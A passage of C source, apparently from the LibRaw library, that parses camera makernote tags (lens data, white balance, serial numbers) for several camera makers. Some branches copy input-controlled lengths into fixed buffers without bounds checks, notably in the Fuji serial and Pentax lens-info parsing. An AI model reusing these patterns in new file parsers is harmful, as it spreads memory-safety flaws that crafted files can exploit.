imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20100102:
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x20100201:
imgdata.lens.makernotes.LensID =
(unsigned long long)fgetc(ifp)<<16 |
(unsigned long long)(fgetc(ifp), fgetc(ifp))<<8 |
(unsigned long long)fgetc(ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
if ((!imgdata.lens.LensSerial[0]))
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens,len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment,len, ifp);
break;
case 0x20200401:
imgdata.other.FlashEC = getreal(type);
break;
}
skip_Oly_broken_tags:;
}
else if (!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG)))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 12, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
imgdata.lens.makernotes.CamID = unique_id = get4();
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len) {
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (saneSonyCameraInfo(table_buf[0], table_buf[3], table_buf[2], table_buf[5], table_buf[4], table_buf[7]))
{
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
}
break;
default:
// CameraInfo2 & 3
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
}
free(table_buf);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 65535) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len < 256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
free(table_buf);
}
}
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
#else
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
/*placeholder */
}
#endif
void CLASS parse_makernote (int base, int uptag)
{
unsigned offset=0, entries, tag, type, len, save, c;
unsigned ver97=0, serial=0, i, wbi=0, wb[4]={0,0,0,0};
uchar buf97[324], ci, cj, ck;
short morder, sorder=order;
char buf[10];
unsigned SamsungKey[11];
uchar NikonKey;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
INT64 fsize = ifp->size();
#endif
/*
The MakerNote might have its own TIFF header (possibly with
its own byte-order!), or it might just be a table.
*/
if (!strncmp(make,"Nokia",5)) return;
fread (buf, 1, 10, ifp);
if (!strncmp (buf,"KDK" ,3) || /* these aren't TIFF tables */
!strncmp (buf,"VER" ,3) ||
!strncmp (buf,"IIII",4) ||
!strncmp (buf,"MMMM",4)) return;
if (!strncmp (buf,"KC" ,2) || /* Konica KD-400Z, KD-510Z */
!strncmp (buf,"MLY" ,3)) { /* Minolta DiMAGE G series */
order = 0x4d4d;
while ((i=ftell(ifp)) < data_offset && i < 16384) {
wb[0] = wb[2]; wb[2] = wb[1]; wb[1] = wb[3];
wb[3] = get2();
if (wb[1] == 256 && wb[3] == 256 &&
wb[0] > 256 && wb[0] < 640 && wb[2] > 256 && wb[2] < 640)
FORC4 cam_mul[c] = wb[c];
}
goto quit;
}
if (!strcmp (buf,"Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek (ifp, offset-8, SEEK_CUR);
} else if (!strcmp (buf,"OLYMPUS") ||
!strcmp (buf,"PENTAX ")) {
base = ftell(ifp)-10;
fseek (ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
} else if (!strncmp (buf,"SONY",4) ||
!strcmp (buf,"Panasonic")) {
goto nf;
} else if (!strncmp (buf,"FUJIFILM",8)) {
base = ftell(ifp)-10;
nf: order = 0x4949;
fseek (ifp, 2, SEEK_CUR);
} else if (!strcmp (buf,"OLYMP") ||
!strcmp (buf,"LEICA") ||
!strcmp (buf,"Ricoh") ||
!strcmp (buf,"EPSON"))
fseek (ifp, -2, SEEK_CUR);
else if (!strcmp (buf,"AOC") ||
!strcmp (buf,"QVC"))
fseek (ifp, -4, SEEK_CUR);
else {
fseek (ifp, -10, SEEK_CUR);
if (!strncmp(make,"SAMSUNG",7))
base = ftell(ifp);
}
// adjust pos & base for Leica M8/M9/M Mono tags and dir in tag 0x3400
if (!strncasecmp(make, "LEICA", 5))
{
if (!strncmp(model, "M8", 2) ||
!strncasecmp(model, "Leica M8", 8) ||
!strncasecmp(model, "LEICA X", 7))
{
base = ftell(ifp)-8;
}
else if (!strncasecmp(model, "LEICA M (Typ 240)", 17))
{
base = 0;
}
else if (!strncmp(model, "M9", 2) ||
!strncasecmp(model, "Leica M9", 8) ||
!strncasecmp(model, "M Monochrom", 11) ||
!strncasecmp(model, "Leica M Monochrom", 11))
{
if (!uptag)
{
base = ftell(ifp) - 10;
fseek (ifp, 8, SEEK_CUR);
}
else if (uptag == 0x3400)
{
fseek (ifp, 10, SEEK_CUR);
base += 10;
}
}
else if (!strncasecmp(model, "LEICA T", 7))
{
base = ftell(ifp)-8;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_T;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
else if (!strncasecmp(model, "LEICA SL", 8))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_SL;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
#endif
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get (base, &tag, &type, &len, &save);
tag |= uptag << 16;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos = ftell(ifp);
if(len > 8 && _pos+len > 2* fsize) continue;
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4)) {
if (tag == 0x0010) {
char FujiSerial[sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
char yy[2], mm[3], dd[3], ystr[16], ynum[16];
int year, nwords, ynum_len;
unsigned c;
stmread(FujiSerial, len, ifp);
nwords = getwords(FujiSerial, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
for (int i = 0; i < nwords; i++) {
mm[2] = dd[2] = 0;
if (strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1) < 18)
if (i == 0)
strncpy (imgdata.shootinginfo.InternalBodySerial,
words[0],
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
else
{
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf), "%s %s",
imgdata.shootinginfo.InternalBodySerial, words[i]);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
else
{
strncpy (dd, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-14, 2);
strncpy (mm, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-16, 2);
strncpy (yy, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18, 2);
year = (yy[0]-'0')*10 + (yy[1]-'0');
if (year <70) year += 2000; else year += 1900;
ynum_len = (int)strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18;
strncpy(ynum, words[i], ynum_len);
ynum[ynum_len] = 0;
for ( int j = 0; ynum[j] && ynum[j+1] && sscanf(ynum+j, "%2x", &c); j += 2) ystr[j/2] = c;
ystr[ynum_len / 2 + 1] = 0;
strcpy (model2, ystr);
if (i == 0) {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
if (nwords == 1)
snprintf (tbuf,sizeof(tbuf),
"%s %s %d:%s:%s",
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12,
ystr, year, mm, dd);
else
snprintf (tbuf,sizeof(tbuf),
"%s %d:%s:%s %s",
ystr, year, mm, dd,
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
} else {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf),
"%s %s %d:%s:%s %s",
imgdata.shootinginfo.InternalBodySerial, ystr, year, mm, dd,
words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
}
}
}
else
parseFujiMakernotes (tag, type);
}
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len, ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON",5))
{
if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0012)
{
char a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c) imgdata.other.FlashEC = (float)(a*b)/(float)c;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData>0)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0x00a0)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
switch (tag) {
case 0x0404:
case 0x101a:
case 0x20100101:
if (!imgdata.shootinginfo.BodySerial[0])
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0x20100102:
if (!imgdata.shootinginfo.InternalBodySerial[0])
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20401112:
imgdata.makernotes.olympus.OlympusCropID = get2();
break;
case 0x20401113:
FORC4 imgdata.makernotes.olympus.OlympusFrame[c] = get2();
break;
case 0x20100201:
{
unsigned long long oly_lensid [3];
oly_lensid[0] = fgetc(ifp);
fgetc(ifp);
oly_lensid[1] = fgetc(ifp);
oly_lensid[2] = fgetc(ifp);
imgdata.lens.makernotes.LensID =
(oly_lensid[0] << 16) | (oly_lensid[1] << 8) | oly_lensid[2];
}
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
break;
}
}
